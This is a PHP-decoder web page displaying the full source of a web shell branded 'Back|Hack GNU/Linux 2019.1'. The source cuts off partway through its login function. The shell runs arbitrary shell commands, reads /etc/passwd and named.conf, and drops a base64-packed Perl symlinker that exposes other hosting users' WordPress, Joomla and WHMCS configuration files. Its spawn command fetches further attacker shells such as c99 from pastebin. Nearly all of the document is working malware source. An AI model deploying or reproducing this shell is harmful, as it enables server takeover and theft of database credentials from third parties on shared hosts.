Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php ################################# # << Back|Hack GNU/Linux 2019.1 # Note : Not usi..

Decoded Output download

Welcome to << Back|Hack GNU/Linux 2019.1 
[Kali Style] 
<form action='' method='POST'> 
kali login : <input type='text' name='login'> 
password : <input type='password' name='pwd'> 
<input type='submit' name='log' value=''>

Did this file decode correctly?

Original Code

<?php
#################################
# << Back|Hack GNU/Linux 2019.1 # Note : Not using system() function. Work in all server. 
#     Command Based WebShell    # Coded by Cy#b3r00T - Sora Cyber Team
################################# Recode? YOUR MOM GAY.
//Edit user & password at line 257 
error_reporting(0);
session_start();
$SERVERIP  = (!$_SERVER['SERVER_ADDR']) ? gethostbyname($_SERVER['HTTP_HOST']) : $_SERVER['SERVER_ADDR'];
?>
<title><< Back|Hack GNU/Linux 2019.1</title>
<body bgcolor='black'><font color='white'>
<style>
input[type=file] {
  color:white;
}
input{
color:white;
background-color:black;
border:0px;
}
a:hover{
color:red;
text-decoration: none;
}
a{
color:blue;
text-decoration: none;
}
</style><pre>
<?php
function usergroup() {
	if(!function_exists('posix_getegid')) {
		$user['name'] 	= @get_current_user();
		$user['uid']  	= @getmyuid();
		$user['gid']  	= @getmygid();
		$user['group']	= "?";
	} else {
		$user['uid'] 	= @posix_getpwuid(posix_geteuid());
		$user['gid'] 	= @posix_getgrgid(posix_getegid());
		$user['name'] 	= $user['uid']['name'];
		$user['uid'] 	= $user['uid']['uid'];
		$user['group'] 	= $user['gid']['name'];
		$user['gid'] 	= $user['gid']['gid'];
	}
	return (object) $user;
}
function pindah($tempat){
echo "<script>window.location='$tempat';</script>";
}
function dashboard(){
$group=usergroup()->group;
$uid=usergroup()->uid;
$gid=usergroup()->gid;
$ip=$GLOBALS['SERVERIP'];
$user=usergroup()->name;
if($uid == "0"){
$bash="#";
}else{
$bash="$";
}
$dir=$_GET['dir'];
if(!$dir){
$dir="~";
}
echo "<form action='' method='POST'><b><font color='red'>$user@$ip</font>:<font color='#5393f4'>$dir</font>$bash </b><input type='hidden' name='dir' value='$dir'><input type='text' name='cmd' autofocus><input type='submit' name='exec' value=''></form>";
if(isset($_POST['exec'])){
$dir=$_POST['dir'];
$cmd=$_POST['cmd'];
if(preg_match('/cd/',$cmd)){
$x=explode(' ',$cmd);
if($x[1] == "/" or $x[1] == "~" or preg_match('|/|',$cmd)){
pindah("?dir=".$x[1]."");
}else{
if(is_dir("$dir/$x[1]")){
pindah("?dir=".$dir."/".$x[1]."");}else{echo "bash: cd: ".htmlspecialchars($x[1]).": No such file or directory";}}
}
elseif($cmd == "ls"){
if($dir=="~"){$dir=getcwd();}
$s=scandir($dir);
foreach($s as $ss){if($ss == "." | $ss == ".."){continue;}
if(is_dir("$dir/$ss")){
echo "<b><font color='#5393f4'>$ss</font></b>\n";
}
elseif(substr(sprintf('%o', fileperms("$ss")), -4)=="0777"){
echo "<b><font color='#88f422'>$ss</font></b>\n";
}elseif(preg_match("/.zip/",$ss) or preg_match("/.rar/",$ss) or preg_match("/.tar/",$ss) or preg_match("/.gz/",$ss)){
echo "<b><font color='red'>$ss</font></b>\n";
}elseif(preg_match("/.jpg/",$ss) or preg_match("/.gif/",$ss) or preg_match("/.png/",$ss) or preg_match("/.mp4/",$ss) or preg_match("/.mp3/",$ss) or preg_match("/.jpeg/",$ss)){
echo "<b><font color='#b92fef'>$ss</font></b>\n";
}elseif(is_link("$dir/$ss")){
echo "<b><font color='#00ffd8'>$ss</font></b>\n";
}else{
echo "$ss\n";
}
}
}
elseif(preg_match("/rm/",$cmd)){
if($dir=="~"){$dir=getcwd();}
chdir($dir);
$x=explode(' ',$cmd);
if(@unlink($x[1])){echo "deleted.";}else{echo "permission denied.";}
}elseif(preg_match("/nano/",$cmd)){
$x=explode(' ',$cmd);
pindah("?dir=$dir&save=$x[1]");
}elseif(preg_match('/cat/',$cmd)){
chdir($dir);
$x=explode(' ',$cmd);
$content=htmlspecialchars(file_get_contents($x[1]));
echo "$content\n";
}elseif(preg_match('/mv/',$cmd)){
$x=explode(' ',$cmd);
if(!$dir or $dir=="~"){$dir=getcwd();}
$old="$x[1]";
$new="$x[2]";
#echo "$old\n$new";
chdir($dir);
if(@rename($old,$new)){echo "renamed.";}else{echo "permission denied.";}
}elseif(preg_match('/uname/',$cmd)){
$x=php_uname();
echo "$x\n";
}elseif(preg_match('/rmdir/',$cmd)){
if(!$dir or $dir=="~"){$dir=getcwd();}
$x=explode(' ',$cmd);
chdir($dir);
rmdir($x[1]);
}elseif(preg_match('/cp/',$cmd)){
if(!$dir or $dir=="~"){$dir=getcwd();}
$x=explode(' ',$cmd);
$f1=$x[1];
$f2=$x[2];
chdir($dir);
if(@copy($f1,$f2)){echo "success.";}else{echo "permission denied.";}
}elseif($cmd == "upload"){
pindah("?dir=$dir&upload");
}elseif(preg_match('/spawn/',$cmd)){
$x=explode(' ',$cmd);
if(getfile($x[1])){echo "success.";}else{echo "permission denied.";}
}elseif($cmd==help){
echo "<< Back|Hack GNU/Linux 2019.1
Coded by Cy#b3r00T - Sora Cyber Team
Logout Shell      : exit
Move File         : mv [old dir] [new dir]
Rename            : mv [old name] [new name]
Copy              : cp [old dir] [new dir]
Delete File       : rm [file]
Delete Dir        : rmdir [dir]
Edit File         : nano [file]
Upload File       : upload
View File Content : cat [file] 
Get UserID        : id
Get Username      : whoami
Get Host IP       : hosts
Get DisabledFunc  : functions
Server Info       : serverinfo
Jumping Server    : jumping
Symlink Server    : symlink
Spawn File        : spawn [name]
                          -adminer -> adminer -> adminer.php
                          -indoxploit -> indoxploit shell -> idx.php
                          -noname -> noname shell -> noname.php
                          -priv8 -> mini shell -> priv8.php
                          -c99 -> c99 shell -> c99.php";
}elseif($cmd == "exit"){
session_destroy();
pindah("?");
}elseif($cmd == "pwd"){
chdir($dir);
echo getcwd();
}elseif($cmd == "id"){
echo "uid=$uid($user) gid=$gid($group)";
}elseif($cmd == "whoami"){
echo "$user";
}elseif($cmd == "hosts"){
echo "$ip";
}elseif($cmd == "functions"){
$func=@ini_get('disable_functions');
if($func == FALSE){
echo "<font color='lime'>[OK] disabled functions is not available (NONE).</font>";
}else{
echo "<font color='red'>$func</font>";
}
}elseif($cmd == "clear"){
pindah("?dir=$dir");
}elseif($cmd == "serverinfo"){
$ip2=$_SERVER['REMOTE_ADDR'];
$function=@ini_get('disable_functions');
if($function == FALSE){$function="<font color='lime'>NONE</font>";}
echo "Server IP     : $ip | Your IP : $ip2
Web Server    : ".$_SERVER['SERVER_SOFTWARE']."
System        : ".php_uname()."
User/Group    : $user($uid)/$group($gid)
PHP Version   : ".phpversion()."
Disabled Func : ".$function."";
}elseif($cmd=="jumping")
{
  function getuser() {
  	$fopen = fopen("/etc/passwd", "r") or die(color(1, 1, "Can't read /etc/passwd"));
  	while($read = fgets($fopen)) {
  		preg_match_all('/(.*?):x:/', $read, $getuser);
  		$user[] = $getuser[1][0];
  	}
  	return $user;
  }
  function getdomainname() {
  	$fopen = fopen("/etc/named.conf", "r");
  	while($read = fgets($fopen)) {
  		preg_match_all("#/var/named/(.*?).db#", $read, $getdomain);
  		$domain[] = $getdomain[1][0];
  	}
  	return $domain;
  }
  $i = 0;
  $ip=$_SERVER['SERVER_ADDR'];
  foreach(getuser() as $user) {
    $path = "/home/$user/public_html";
      $i++;
      print "<a href='?dir=$path'>$path</a>";
      if(!function_exists('posix_getpwuid')) print "<br>";
      if(!getdomainname()) print " -> Can't get domain name<br>";
      foreach(getdomainname() as $domain) {
        $userdomain = (object) @posix_getpwuid(@fileowner("/etc/valiases/$domain"));
        $userdomain = $userdomain->name;
        if($userdomain === $user) {
          print " => <a href='http://$domain/' target='_blank'>$domain)</a><br>";
          break;
        }
      }
    }
    print ($i === 0) ? "" : "<p>Total ada $i kamar di ".$GLOBALS['SERVERIP']."</p>";
}elseif($cmd == "symlink") {
chdir($dir);
		if(!is_writable($dir)){echo "<font color='red'>can't create directory 'backhack_sym'. permission denied</font>";exit;}
		if(!is_dir("$dir/backhack_sym/")) {
			$sym['code'] = "#!/usr/bin/perl -I/usr/local/bandmin
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
#		Name : Perl/CGI Config Symlinker (With Auto Bypass Symlink 404)
#		Version : 1.2
#		Created : 9 Mei 2017
#		Author : 0x1999
#		Thanks To : 0xIDiot , Indonesian Code Party , Jatim4u
#		More Info : http://0xDark.blogspot.com
#		Want to recode ? Don't forget my nick name  :)
#		http://facebook.com/melex.1d
#		
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 

use File::Copy;
use strict;
use warnings;
use MIME::Base64;
copy("/etc/passwd","passwd.txt") ;
mkdir "backhack_sym";
symlink("/","backhack_sym/root");
my $filename = 'passwd.txt';
my $htaccess = decode_base64("T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBpbmRveHBsb2l0Lmh0bQ0KQWRkVHlwZSB0ZXh0L3BsYWluIC5waHAgDQpBZGRIYW5kbGVyIHRleHQvcGxhaW4gLnBocA0KU2F0aXNmeSBBbnkNCkluZGV4T3B0aW9ucyArQ2hhcnNldD1VVEYtOCArRmFuY3lJbmRleGluZyArSWdub3JlQ2FzZSArRm9sZGVyc0ZpcnN0ICtYSFRNTCArSFRNTFRhYmxlICtTdXBwcmVzc1J1bGVzICtTdXBwcmVzc0Rlc2NyaXB0aW9uICtOYW1lV2lkdGg9KiANCkFkZEljb24gJ2RhdGE6aW1hZ2UvcG5nO2Jhc2U2NCxpVkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBQkFBQUFBUUNBWUFBQUFmOC85aEFBQUFCSE5DU1ZRSUNBZ0lmQWhraUFBQUFBbHdTRmx6QUFBTjF3QUFEZGNCUWlpYmVBQUFBQmwwUlZoMFUyOW1kSGRoY21VQWQzZDNMbWx1YTNOallYQmxMbTl5WjV2dVBCb0FBQUZVU1VSQlZEaU5wWks5U2dOQkZJWFB2WE5uZGpjUm9wWDRVNGtXVnI1QUNoVTdIOEJTZkl0QUhrQjlDWHNyVzBHd0VRdFJ3VktNUnRBVThaY1lXYU5tTTJPeHF5eWlZWmRjR0lhWjRaNzdNZWVRY3c2REZBL1VEVUFBWUhIajhoT0FUajlvUlNlMloxZjJLalAxZmdMa25NUFM1bFcwVmk0cFpvcHZIWERXK0loT3I5OWdYVHprcjlxdlRCTXRyTmQ4QXNMVmNvbVpLRFA2MWtFTGloR0lKOVFCZ08yamRzSUUvSmI1T2FjR0ZBd0RRRWVNRU9abmgxRXFNQ2h0U0I4YTY0QlcyTU5oN1FWaWhDR0tjTkhzd21aMGxBa1lIeEY0UWhCUENLSVlSVTlsNjA1S21HQ0VJVVl6dENZTUJma0VqR1o0T2lId1JRRit2a1FHK3B0QUNJRlJFSlZQUUF2RmYrQnJqb3lRK0NaZnFxMTE4RFJGRWhqZWJiYmVsNmRHaXlUcWYrdlNya2FSUS8wdXRMN21IWGw5dnErZVAzVW5iaC9INWdES2lPRjY3WWViWTBkU0pjUkJtMHoyckZsMnlXcDhBVkRJVzMyZGE3cExBQUFBQUVsRlRrU3VRbUNDJyBeXkRJUkVDVE9SWV5eDQpEZWZhdWx0SWNvbiAnZGF0YTppbWFnZS9wbmc7YmFzZTY0LGlWQk9SdzBLR2dvQUFBQU5TVWhFVWdBQUFCQUFBQUFRQ0FZQUFBQWY4LzloQUFBQUFYTlNSMElBcnM0YzZRQUFBQVppUzBkRUFQOEEvd0Qvb0wybmt3QUFBQWx3U0ZsekFBQUxFd0FBQ3hNQkFKcWNHQUFBQUFkMFNVMUZCOW9KQmhjVEp2MkIyZDRBQUFKTVNVUkJWRGpMYlpPOVRoeFpFSVcvcWx2ZHRNMzhCTmdKUW1RZ0pHZCtBL01RQkx3R2ppd0gzbndka1NMdE8yeEVSRzVMcXhYUlNJUjJZRGZENEdrR00wUDNyYjRiOVBBejBsN3BTbFdsVzBmbm5Mb2xBSVBCNFBYaDRlRnVudWNBSUlMd2RFU2VaeUFpZm5wNit1OW9OTG8zZ00zTnpUZEhSKy8venZKTXpTeUpLS29kaUlnOEFYYXhlSXoxYkRaN014cU5mdGdTVVJEV3k3TFVuWjBkWW14QUZBVkVsSTZBRUN5Z0lzUVFzaXpMQk9BQkFET2pLQXBxaDd1N0dvQ1VXaXdZYmV0b1VIcnJQY3dDcW9GMktVZVhMekV6QnYwK3VRbVNITUVaOUY2U1pjcjZpNElzQk9hL2I3SFFNYUh0SUF3Z0xkSGFsREExZXYwZVFiU2pyRXJRd0pwcUY0ZUF4L2hvcUQxMzJtTWtKcmk1dVNPbEZoRWhwVVFJaW9qd2FtT0ROc2xqZlVXQ3FwTG5PYWFDU0tKdG5hQkNzWllqQWxsbVhJNHZhZW9hVlgwY2JTZGhtVVIzekFLdk5qWTZWaW9vMHRXemdFb25LYlcrS2tHV3QzVW50MENlR2ZKczlnK1VVMHJFR0hIL0h3L01qSDYvVCtQT2RGb1JOS0NoTTIyeG1PUGVzcGpQR1E2SHBOUTI3dDZzQUNEU05hbnlvbGpETEVkVmFGT0xlOFprVWpLNXVrcTN0NzlsUEM3L09EazVHYStZNk81TXF5bU53M1YxeTNoeXpmWDBocXZKTHliWEZkKytmMmQzZDBkbXMrcXZnNE9EejhmSHgwL0xzYmUzOTY0c1M3KzR1RWp1bnBxbVNlNmUzRDNONS9OMFdaYnRseTlmMDluWjJaL2IyOXYyZkxFZXZ2SzlxdjdjMnRvS2k4VWlpUWlxSGJtNnJpVzZhMTNmbit6djczK29xb3JoY0xnS1VGWFZQK2ZuNTIrTG9uajhJTEowUDhaSUNDRjkvUFRwQ2xocEJ2Z1BlbG9MOVU1NU5JQUFBQUFBU1VWT1JLNUNZSUk9Jw0KSW5kZXhJZ25vcmUgKi50eHQ0MDQNCkluZGV4U3R5bGVTaGVldCAnaHR0cDovL2V2ZW50LmluZG94cGxvaXQub3IuaWQvc3ltbGluay5jc3MnDQpSZXdyaXRlRW5naW5lIE9uDQpSZXdyaXRlQ29uZCAle1JFUVVFU1RfRklMRU5BTUV9IF4uKjB4c3ltNDA0IFtOQ10NClJld3JpdGVSdWxlIFwudHh0JCAle1JFUVVFU1RfVVJJfTQwNCBbTCxSPTMwMi5OQ10=");
my $sym = decode_base64("T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBpbmRveHBsb2l0Lmh0bQ0KSGVhZGVyTmFtZSAweDE5OTkudHh0DQpTYXRpc2Z5IEFueQ0KSW5kZXhPcHRpb25zIElnbm9yZUNhc2UgRmFuY3lJbmRleGluZyBGb2xkZXJzRmlyc3QgTmFtZVdpZHRoPSogRGVzY3JpcHRpb25XaWR0aD0qIFN1cHByZXNzSFRNTFByZWFtYmxlDQpJbmRleElnbm9yZSAqDQpJbmRleFN0eWxlU2hlZXQgJ2h0dHA6Ly9ldmVudC5pbmRveHBsb2l0Lm9yLmlkL3N5bWxpbmsuY3NzJw==");
open(my $fh1, '>', 'backhack_sym/.htaccess');
print $fh1 "$htaccess";
close $fh1;
open(my $xx, '>', 'backhack_sym/nemu.txt');
print $xx "$sym";
close $xx;
open(my $fh, '<:encoding(UTF-8)', $filename);
while (my $row = <$fh>) {
my @matches = $row =~ /(.*?):x:/g;
my $usernya = $1;
my @array = (
	{configdir => '/home/'.$usernya.'/.accesshash', type => 'WHM-accesshash' },
	{configdir => '/home/'.$usernya.'/public_html/config/koneksi.php', type => 'Lokomedia' },
	{configdir => '/home/'.$usernya.'/public_html/config/settings.inc.php', type => 'PrestaShop' },
	{configdir => '/home/'.$usernya.'/public_html/app/etc/local.xml', type => 'Magento' },
	{configdir => '/home/'.$usernya.'/public_html/admin/config.php', type => 'OpenCart' },
	{configdir => '/home/'.$usernya.'/public_html/application/config/database.php', type => 'Ellislab' },
	{configdir => '/home/'.$usernya.'/public_html/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/wp/test/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/blog/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/beta/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/portal/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/site/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/wp/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/WP/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/news/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/wordpress/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/test/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/demo/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/home/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/v1/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/v2/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/press/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/new/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/blogs/wp-config.php', type => 'Wordpress' },
	{configdir => '/home/'.$usernya.'/public_html/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/blog/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/submitticket.php', type => '^WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/cms/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/beta/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/portal/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/site/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/main/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/home/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/demo/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/test/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/v1/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/v2/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/joomla/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/new/configuration.php', type => 'Joomla' },
	{configdir => '/home/'.$usernya.'/public_html/WHMCS/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/whmcs1/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Whmcs/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/whmcs/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/whmcs/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/WHMC/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Whmc/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/whmc/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/WHM/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Whm/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/whm/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/HOST/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Host/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/host/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/SUPPORTES/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Supportes/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/supportes/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/domains/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/domain/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Hosting/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/HOSTING/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/hosting/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/CART/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Cart/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/cart/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/ORDER/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Order/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/order/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/CLIENT/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Client/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/client/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/CLIENTAREA/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Clientarea/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/clientarea/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/SUPPORT/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Support/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/support/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/BILLING/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Billing/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/billing/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/BUY/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Buy/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/buy/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/MANAGE/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Manage/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/manage/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/CLIENTSUPPORT/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/ClientSupport/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Clientsupport/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/clientsupport/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/CHECKOUT/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Checkout/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/checkout/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/BILLINGS/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Billings/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/billings/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/BASKET/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Basket/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/basket/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/SECURE/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Secure/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/secure/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/SALES/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Sales/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/sales/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/BILL/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Bill/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/bill/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/PURCHASE/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Purchase/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/purchase/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/ACCOUNT/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Account/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/account/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/USER/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/User/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/user/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/CLIENTS/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Clients/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/clients/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/BILLINGS/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/Billings/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/billings/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/MY/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/My/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/my/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/secure/whm/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/secure/whmcs/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/panel/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/clientes/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/cliente/submitticket.php', type => 'WHMCS' },
	{configdir => '/home/'.$usernya.'/public_html/support/order/submitticket.php', type => 'WHMCS' }
);
foreach (@array){
	my $confignya = $_->{configdir};
	my $typeconfig = $_->{type};
	symlink("$confignya","backhack_sym/$usernya-$typeconfig.txt");
	mkdir "backhack_sym/$usernya-$typeconfig.txt";
	symlink("$confignya","backhack_sym/$usernya-$typeconfig.txt/0x1999.txt");
	copy("backhack_sym/nemu.txt","backhack_sym/$usernya-$typeconfig.txt/.htaccess") ;
	}
}
print "Content-type: text/html\n\n";
print "<head><title>Bypass 404 By 0x1999</title></head>";
print '<meta http-equiv="refresh" content="5; url=backhack_sym"/>';
print '<body><center><h1>0x1999 Never Die</h1>';
print '<a href="backhack_sym">Klik Disini</a>';
unlink($0);";
			save("/tmp/symlink.pl", "w", base64_decode($sym['code']));
			system("perl /tmp/symlink.pl");
			sleep(1);
			@unlink("/tmp/symlink.pl");
			@unlink("passwd.txt");
			@unlink("backhack_sym/pas.txt");
			@unlink("backhack_sym/nemu.txt");
		}else{
		echo "<font color='lime'>[ok] symlink -> $dir/backhack_sym/";
		}
		echo "success -> $dir/backhack_sym/";
	}else{
	$cmd2=$cmd;
	if(preg_match('/ /',$cmd2)){$x=explode(' ',$cmd2);$cmd2=$x[0];}
	if(command_exist($cmd2)){
chdir($dir);
system($cmd);
}else{
echo "bash: ".htmlspecialchars($cmd2).": command not found";
}
}
}
}
function command_exist($cmd) {
    $return = shell_exec(sprintf("which %s", escapeshellarg($cmd)));
    return !empty($return);
}
function getfile($name) {
  if($name === "adminer") $get = array("https://www.adminer.org/static/download/4.3.1/adminer-4.3.1.php", "adminer.php");
  if($name === "indoxploit") $get = array("https://pastebin.com/raw/UJLd1DpM", "idx.php");
  if($name === "noname") $get = array("https://pastebin.com/raw/Pg3PnEir", "noname.php");
  if($name === "priv8") $get = array("https://pastebin.com/raw/7UM5eku8", "priv8.php");
  if($name === "c99") $get = array("https://pastebin.com/raw/hPzPr5A6", "c99.php");
    $fp = fopen($get[1], "w");
    $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $get[0]);
        curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
          curl_setopt($ch, CURLOPT_FILE, $fp);
    return curl_exec($ch);
          curl_close($ch);
    fclose($fp);
    ob_flush();
    flush();
  }
function login(){
$user='root';$auth='toor'; // Change me.
